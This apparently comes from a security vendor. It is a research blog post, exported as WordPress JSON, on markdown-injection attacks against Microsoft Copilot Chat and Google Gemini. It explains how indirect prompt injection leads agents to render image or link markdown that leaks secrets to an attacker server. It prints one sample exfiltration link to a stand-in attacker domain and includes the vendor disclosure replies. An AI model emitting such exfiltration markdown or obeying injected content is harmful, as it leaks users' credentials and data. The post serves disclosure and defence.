{"id":105964,"date":"2025-12-04T18:30:00","date_gmt":"2025-12-04T16:30:00","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?post_type=zero-post&#038;p=105964"},"modified":"2026-02-27T20:39:36","modified_gmt":"2026-02-27T18:39:36","slug":"exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","title":{"rendered":"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini"},"content":{"rendered":"<p class=\"print-source-info\"><script>document.write(\"Copyright Checkmarx, all rights reserved. Retrieved \"+new Date().toLocaleDateString()+\" from<br\/>\"+window.location.href);<\/script><noscript>This document copyright Checkmarx, all rights reserved.<\/noscript><\/p>\n\n\n\n<p>Checkmarx Zero has been exploring AI and agent security, with an increased emphasis on this topic following our discovery of <a href=\"https:\/\/checkmarx.com\/zero-post\/bypassing-ai-agent-defenses-with-lies-in-the-loop\/\">the novel Lies-in-the-Loop attack<\/a> (LITL), which bypasses \u201cHuman-in-the-Loop\u201d (HITL) controls meant to prevent AI agents from running harmful code. During this research, we found several cases of <strong>markdown injection<\/strong> in AI agents, leading to data exfiltration.<\/p>\n\n\n\n<p>Microsoft Copilot Chat and Google Gemini are both vulnerable to this issue, which enables data exfiltration through malicious markdown content that leaks sensitive information via image requests and other rendering behaviors.
We suspect most AI agents have similar issues.<\/p>\n\n\n\n<p>Markdown injections can also serve as an amplifier for LITL attacks, a behavior we thoroughly discuss in the <a href=\"https:\/\/checkmarx.com\/zero-post\/turning-ai-safeguards-into-weapons-with-hitl-dialog-forging\/\">dedicated LITL attack blog post<\/a>, which we highly encourage reading if you\u2019re interested in AI agent security.<\/p>\n\n\n\n<p>Today, however, we want to explore markdown injection as a standalone vulnerability in Copilot Chat and Google Gemini, demonstrating independent exploitation techniques and attack vectors (similar to those introduced in the <a href=\"https:\/\/www.aim.security\/aim-labs\/aim-labs-echoleak-blogpost\">Echo Leak<\/a> vulnerability).<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-1\">Zero-click data exfiltration vulnerability (aka Echo&nbsp;Leak)<\/h2>\n\n\n\n<p>A zero-click data exfiltration attack is one in which someone steals data without requiring a legitimate user to take any specific action. The attacker exploits a vulnerability that automatically processes data, so your device leaks data only because it received something from a remote source.<\/p>\n\n\n\n<p>Zero-click data exfiltration can occur, for example, when an agent renders certain <a href=\"https:\/\/en.wikipedia.org\/wiki\/Markdown\">Markdown<\/a> elements, such as images. Under the hood, the AI agent\u2019s renderer sends a request to the remote server to fetch the image, then embeds it directly in the conversation. However, attackers can trick the agent into fetching an image (or requesting any content that the agent can be convinced is likely to be an image) from an attacker-controlled server.
The attacker can construct the request so that sensitive information is part of the URL, for example, causing the information to leak to the attacker\u2019s server.<\/p>\n\n\n\n<p>Here\u2019s a simple demo that shows how to exfiltrate sensitive information (in this case, it\u2019s Claude\u2019s API key; we used an invalidated key for the demo, for safety reasons) from the developer environment into an attacker-controlled webhook:<\/p>\n\n\n\n<div class=\"cxzero-video-include\">\n<video muted controls controlslist=\"nodownload noremoteplayback\">\n<source src=\"\/wp-content\/uploads\/2025\/12\/cxzero-ms-copilot-md-inject-full.mp4\" type=\"video\/mp4\">\n<p><em>Your browser cannot display this video content<\/em><\/p>\n<\/video>\n<p class=\"caption\">Exploiting Markdown Injection to cause Copilot to exfiltrate a Claude API key<\/p>\n<\/div>\n\n\n\n<p>We reported this issue to Microsoft, but they did <strong><em>not <\/em><\/strong>consider it a vulnerability (their response is available at the bottom of this page). This is in line with how agent vendors have generally viewed unsafe behavior of this type: they consider it a risk the user accepts, and the user is responsible for managing that risk.<\/p>\n\n\n\n<p>This technique is powerful because it only requires the agent to rely on an attacker-controlled online resource, such as an article. This makes the attack simple to set up. Fortunately for defenders, though, it can be somewhat complex for the attacker to get the agent to consume the malicious resource. Once that happens, however, the indirect prompt injection will tamper with the agent\u2019s output in the chat. This causes the image element to be rendered immediately and leak sensitive information without requiring any further user intervention.
Note that in the recorded demo, the image isn\u2019t rendered as a visual element; however, the GET request is still sent to the webhook.<\/p>\n\n\n\n<p>This is how injecting image elements via Markdown injection in AI agents can facilitate zero-click data exfiltration. Mitigating this risk typically involves either stripping or blocking image elements in the Markdown renderer.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-2\">One-click data exfiltration<\/h2>\n\n\n\n<p>The widely discussed zero-click data exfiltration is not the end of the story. It\u2019s possible to trigger one-click data exfiltration with simple links.<\/p>\n\n\n\n<p>Take this markdown link for example:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;click here](https:\/\/attacker-controlled-domain.com?sensitiveInfo={secret})<\/code><\/pre>\n\n\n\n<p>Where <code>{secret}<\/code> is replaced with the actual value of the sensitive information, as shown in the Microsoft Copilot Chat zero-click demo above.<\/p>\n\n\n\n<p>Given that Microsoft didn\u2019t commit to fixing the issue of zero-click data exfiltration because it wasn\u2019t considered a vulnerability, we don\u2019t expect the one-click data exfiltration variant will be fixed either.<br>However, Google Gemini prevents zero-click data exfiltration (like EchoLeak) by blocking Markdown image tags using a dedicated sanitizer:<\/p>\n\n\n\n<blockquote>\n<p>Our markdown sanitizer identifies external image URLs and will not render them, making the \u201cEchoLeak\u201d 0-click image rendering exfiltration <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2025-32711\">vulnerability<\/a> not applicable to Gemini.<\/p>\n<p class=\"caption\"><a href=\"https:\/\/security.googleblog.com\/2025\/06\/mitigating-prompt-injection-attacks.html\">Reference: Mitigating prompt injection attacks with a layered defense strategy<\/a><\/p>\n<\/blockquote>\n\n\n\n<p>Diving
deeper into Google\u2019s philosophy and <a href=\"https:\/\/security.googleblog.com\/2025\/06\/mitigating-prompt-injection-attacks.html\">security strategy for mitigating prompt injection attacks<\/a> reveals that while they reduce certain risks, this solution remains incomplete. They don\u2019t prevent one-click data exfiltration attacks. We reported the issue to their security team, who responded with \u201cfix is not feasible\u201d. This is an acceptable answer, but it means users should be warned about this risk, since this position puts it in their hands to manage.<\/p>\n\n\n\n<p>Google\u2019s strategy involves removing known malicious URLs and other suspicious links from Gemini responses, reducing phishing and malicious link risks in general. They do so thanks to the <a href=\"https:\/\/safebrowsing.google.com\/\">Google Safe Browsing project<\/a>; however, these links must be recognized as malicious in advance, before they can be removed, meaning new threats are not automatically flagged. Attackers can set up their own <strong><em>new <\/em><\/strong>domain (i.e., one not yet known to the Google Safe Browsing Project) and exploit markdown links to exfiltrate data, rather than the restricted image elements.<\/p>\n\n\n\n<p>Combine this with social engineering and redirects, and clicking such links could easily lead to unnoticed data exposure. This attack pathway is not unique to AI agents, of course, but the layer of indirection provided by an attacker getting an AI agent to participate in the attack is a novel advantage for the attacker.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-3\">Impact<\/h2>\n\n\n\n<p>Data exfiltration through prompt injections, including markdown injection, in AI agents can lead to severe consequences.
Anything from source code disclosure to leaked secrets can not only result in a complete compromise of the remote machine but also pave the way for an attacker to escalate their privileges horizontally or vertically. Ultimately, data leaks can have serious consequences for organizations regardless of the pathway through which the data escapes. Yet the rapid adoption of AI agents in particular has created blind spots to this type of threat, which security organizations must become aware of and act to control.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-4\">Mitigations<\/h2>\n\n\n\n<p>Besides Markdown sanitization, the obvious measure in this context (though perhaps not as obvious, given that Microsoft completely ignores it) is to ensure that when the agent runs on the web, it not only sanitizes Markdown\/HTML but also enforces a strict CSP (Content Security Policy), particularly for resources such as images and CSS styles, which attackers find easiest to exploit.<\/p>\n\n\n\n<p>In the context of suggested mitigations, it is worth highlighting how Google handles Markdown and suspicious links. We highly recommend reading Google\u2019s full article \u201c<a href=\"https:\/\/security.googleblog.com\/2025\/06\/mitigating-prompt-injection-attacks.html\">Mitigating prompt injection attacks with a layered defense strategy.<\/a>\u201d<\/p>\n\n\n\n<p>However, remember that even though Gemini identifies &amp; restricts external image URLs as a defensive measure against zero-click data exfiltration, it does not eliminate the one-click data exfiltration risks via external URIs in the links it shares.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-5\">Wrapping Up<\/h2>\n\n\n\n<p>Markdown injection in AI agents has been recognized for some time as a risk. Nevertheless, these vulnerabilities still find their way into very popular products, such as Copilot Chat.
As always with security, when new technologies emerge, it takes time for the industry to catch up\u200a\u2014\u200aespecially in this rapidly exploding area of AI, where both usage and attack surface are expanding simultaneously. But that\u2019s exactly what should make us, as security professionals, the ones who keep an eye on the door.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-6\">Disclosure timeline<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"ExploitingMarkdownInjectioninMicrosoftCopilotChat&amp;GoogleGemini-Google\">Google<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>First Disclosure &#8211; 05 Oct 2025<\/li>\n\n\n\n<li>Google closed the issue with status <code>Won't Fix (Infeasible)<\/code> &#8211; 09 Oct 2025<\/li>\n\n\n\n<li>Google&#8217;s final response below<\/li>\n<\/ul>\n\n\n\n<blockquote>\n<p>Hi! We&#8217;ve decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team.<\/p>\n\n<p>Regarding VRP, we feel that the submission falls outside of the intended program scope, since we require submissions to demonstrate technical security vulnerabilities with a sufficient severity. For example, Google VRP covers only submissions that &#8220;substantially affect the confidentiality or integrity of user data&#8221;.<\/p>\n\n<p>To provide feedback on our products, you can use our Google Product Forums, where you can share your feedback with other users and our product team.
That said \u2013 if you think we misunderstood your report, and you see a well-defined security risk, please let us know what we missed.<\/p>\n\n<p>Thanks again for your report and time,<\/p>\n<\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\">Microsoft<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Report was submitted &#8211; 15 Oct 2025<\/li>\n\n\n\n<li>Microsoft acknowledges the report &#8211; 15 Oct 2025<\/li>\n\n\n\n<li>Microsoft notified us that the engineering team is still working on the issue &#8211; 28 Oct 2025<\/li>\n\n\n\n<li>Microsoft marks the report as Completed without fixing the issue &#8211; 04 Nov 2025<\/li>\n<\/ul>\n\n\n\n<blockquote>\n<p>MSRC&nbsp;&nbsp;&nbsp; <small>Nov 4, 2025, 7:48 PM<\/small><\/p>\n\n<p>Dear Ori,<\/p>\n\n<p>Thank you for your submission and for continuing to engage with MSRC.<\/p>\n\n<p>After careful review, we&#8217;ve determined that the behavior demonstrated does not meet our classification for a security vulnerability. It requires multiple non-default user actions, does not reliably reproduce across environments, and includes warnings designed to mitigate risk.<\/p>\n\n<p>Our assessment also considers the role of Workplace Trust, which assumes users operate in environments where they review and trust the code they choose to run. This principle is reflected in Microsoft&#8217;s AI Vulnerability Severity Classification, which evaluates both impact and exploitability.<\/p>\n\n<p>That said, we agree this is a thoughtful observation.
While not classified as a vulnerability, we&#8217;ve shared it with the engineering team to explore ways we can make this behavior more transparent to users.<\/p>\n\n<p>We appreciate your efforts to highlight potential concerns and welcome future submissions that demonstrate broader impact or bypass existing safeguards.<\/p>\n\n<p>Sincerely,\nJustin<\/p>\n\n<p>Microsoft Security Response Center<\/p>\n<\/blockquote>","protected":false},"excerpt":{"rendered":"<p>AI agents provide only very thin defenses against malicious behavior. Popular AI agents such as Microsoft&#8217;s Copilot Chat and Google Gemini can experience injection from Markdown content they include in their context. Learn how markdown injection in AI agents works and how different products try to mitigate it.<\/p>\n","protected":false},"author":121,"featured_media":105970,"template":"","zero-category":[1067,1176,1179,1104],"zero-tag":[1097,1408,1069,1068,1464,1071],"class_list":["post-105964","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-blog","zero-category-security-blogs","zero-category-security-trends","zero-category-technical-blog","zero-tag-ai","zero-tag-ai-agent","zero-tag-appsec","zero-tag-checkmarx-security-research-team","zero-tag-markdown","zero-tag-supply-chain-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx\" \/>\n<meta property=\"og:description\" content=\"AI agents provide only very
thin defenses against malicious behavior. Popular AI agents such as Microsoft&#039;s Copilot Chat and Google Gemini can experience injection from Markdown content they include in their context. Learn how markdown injection in AI agents works and how different products try to mitigate it.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\" \/>\n<meta property=\"og:site_name\" content=\"Checkmarx\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-27T18:39:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@checkmarx\" \/>\n<meta name=\"twitter:label1\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\",\"url\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\",\"name\":\"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx\",\"isPartOf\":{\"@id\":\"https:\/\/checkmarx.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp\",\"datePublished\":\"2025-12-04T16:30:00+00:00\",\"dateModified\":\"2026-02-27T18:39:36+00:00\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp\",\"width\":2560,\"height\":1280,\"caption\":\"Street-art-style cyberpunk 
illustration of two AI chatbot figures with headset silhouettes flanking a computer monitor as a syringe injects code into the screen; neon green, black, purple, and red accents on a gritty graffiti background suggest \u2018markdown injection\u2019 attacks against AI systems\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/checkmarx.com\/#website\",\"url\":\"https:\/\/checkmarx.com\/\",\"name\":\"Checkmarx\",\"description\":\"The world runs on code. We secure it.\",\"publisher\":{\"@id\":\"https:\/\/checkmarx.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/checkmarx.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/checkmarx.com\/#organization\",\"name\":\"Checkmarx\",\"url\":\"https:\/\/checkmarx.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"width\":1,\"height\":1,\"caption\":\"Checkmarx\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\",\"https:\/\/x.com\/checkmarx\",\"https:\/\/www.youtube.com\/user\/CheckmarxResearchLab\",\"https:\/\/www.linkedin.com\/company\/checkmarx\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","og_locale":"en_US","og_type":"article","og_title":"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx","og_description":"AI agents provide only very thin defenses against malicious behavior. Popular AI agents such as Microsoft's Copilot Chat and Google Gemini can experience injection from Markdown content they include in their context. Learn how markdown injection in AI agents works and how different products try to mitigate it.","og_url":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","og_site_name":"Checkmarx","article_publisher":"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","article_modified_time":"2026-02-27T18:39:36+00:00","og_image":[{"width":2560,"height":1280,"url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp","type":"image\/webp"}],"twitter_card":"summary_large_image","twitter_site":"@checkmarx","twitter_misc":{"Est. 
reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","url":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/","name":"Exploiting Markdown Injection in AI agents: Microsoft Copilot Chat and Google\u00a0Gemini - Checkmarx","isPartOf":{"@id":"https:\/\/checkmarx.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage"},"image":{"@id":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage"},"thumbnailUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp","datePublished":"2025-12-04T16:30:00+00:00","dateModified":"2026-02-27T18:39:36+00:00","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/zero-post\/exploiting-markdown-injection-in-ai-agents-microsoft-copilot-chat-and-google-gemini\/#primaryimage","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/12\/cxzero-feature_copilot-gemini-markdown-injection-in-ai-agents.webp","width":2560,"height":1280,"caption":"Street-art-style cyberpunk illustration of two AI chatbot figures with headset silhouettes flanking a computer monitor as a syringe injects code into the screen; neon green, black, purple, and red accents on a gritty graffiti 
background suggest \u2018markdown injection\u2019 attacks against AI systems"},{"@type":"WebSite","@id":"https:\/\/checkmarx.com\/#website","url":"https:\/\/checkmarx.com\/","name":"Checkmarx","description":"The world runs on code. We secure it.","publisher":{"@id":"https:\/\/checkmarx.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/checkmarx.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/checkmarx.com\/#organization","name":"Checkmarx","url":"https:\/\/checkmarx.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","width":1,"height":1,"caption":"Checkmarx"},"image":{"@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","https:\/\/x.com\/checkmarx","https:\/\/www.youtube.com\/user\/CheckmarxResearchLab","https:\/\/www.linkedin.com\/company\/checkmarx"]}]}},"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/105964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/121"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/105970"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=105964"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=105964"
},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=105964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}